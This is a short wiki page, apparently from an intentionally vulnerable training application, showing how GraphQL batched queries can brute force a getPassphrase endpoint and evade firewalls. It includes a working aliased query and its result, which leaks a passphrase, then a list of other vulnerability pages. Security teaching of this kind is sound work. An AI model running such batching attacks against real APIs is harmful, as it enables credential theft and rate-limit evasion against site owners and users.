-
Notifications
You must be signed in to change notification settings - Fork 171
GraphQL Batching Brute Force
Sam Sanoop edited this page Sep 8, 2022
·
2 revisions
GraphQL supports batched queries. This feature can be abused to bypass web application firewalls and conduct denial of service attacks.
The getPassphrase endpoint can be brute forced to find passphrases of all users.
query Query {
first: getPassphrase(reminder:"t"){
passphrase,
reminder
}
second: getPassphrase(reminder:"te"){
passphrase,
reminder
}
third: getPassphrase(reminder:"test"){
passphrase,
reminder
}
}
Result:
{
"data": {
"first": null,
"second": null,
"third": {
"passphrase": "397a363a383a3180496e6d3371714a7c",
"reminder": "test"
}
}
}
- XML External Entity Injection
- Server Side Request Forgery (SSRF)
- Username Enumeration
- NoSQL Injection
- Insecure Direct Object Reference
- Mass Assignment
- Cross Site Scripting (XSS)
- Hidden API Functionality Exposure
- SQL Injection
- Information Disclosure
- Insecure PostMessage Configuration
- Command Injection
- Prototype Pollution
- JSON Hijacking
- XPath Injection
- Cross Origin Resource-Sharing Misonfiguration
- JWT Secret Key Brute Force
- Vertical Access Control
- Horizontal Access Control
- Open Redirect
- Path Traversal
- Unsafe Deserialization
- Sensitive Data Exposure
- Arbitrary File Write
- Introspection Enabled
- GraphQL Access Control Issues
- GraphQL Batching Brute Force
- Client Side Template Injection